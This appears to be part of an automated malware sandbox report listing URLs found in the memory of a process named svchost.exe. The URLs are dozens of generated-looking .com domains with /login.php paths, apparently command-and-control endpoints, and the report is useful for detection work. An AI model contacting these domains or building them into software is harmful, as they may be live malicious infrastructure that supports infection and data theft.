    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/login.php3
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461024181.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460509147.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461420985.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyhiw.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galypyh.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2658367884.0000000003A60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2620626150.0000000006148000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573890661.0000000006148000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587355096.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663353098.00000000060C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyqaz.com/login.php
    Source: svchost.exe, 00000002.00000003.2069850659.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077691101.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyqoh.com/
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579923926.000000000615C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580902534.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575937729.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576857106.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576872039.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyros.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyryz.com/login.php
    Source: svchost.exe, 00000002.00000003.1820622823.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820638781.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546391419.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvas.com/
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550034338.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546693862.000000000B457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvas.com/login.php
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvaw.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyzeb.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganycuh.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganydiw.com/login.php
    Source: svchost.exe, 00000002.00000003.1841502213.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841504956.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyfes.com/
00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003160513.00000000061F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygygin.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyjuj.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850899748.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygylax.com/login.php
    Source: svchost.exe, 00000002.00000003.2069850659.00000000060EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymod.com/
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418399086.00000000060CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymoj.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600322672.000000000B456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymyn.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B44D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1464966899.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygynud.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084205455.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygynyr.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysid.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysij.com/
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533898265.0000000002957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526067014.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526019425.000000000294D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysij.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvon.com/login.php
    Source: svchost.exe, 00000002.00000003.1876564689.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885927315.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573220991.000000000600B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygywor.com/login.php
    Source: svchost.exe, 00000002.00000003.2063012726.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2067567385.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073801182.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygywyj.com/login.php
    Source: svchost.exe, 00000002.00000003.1547180269.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550239524.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559573077.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1564225122.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxun.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533526406.000000000295D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552047254.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533898265.0000000002957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526067014.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550101575.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526019425.000000000294D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfen.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755017.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722234012.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygur.com/login.php
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjad.com/
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1464966899.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjad.com/login.php
    Source: svchost.exe, 00000002.00000003.1590675413.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591229349.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2017552428.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595288365.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594416015.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjux.com/login.php
    Source: svchost.exe, 00000002.00000003.1579481931.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577836262.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583773094.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591194658.0000000006008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylan.com/login.php
    Source: svchost.exe, 00000002.00000002.2675178406.000000000B454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663213294.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085531823.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykymij.com/login.php
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynyd.com/
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynyd.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykytej.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546775468.00000000029AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvod.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvor.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywex.com/login.php
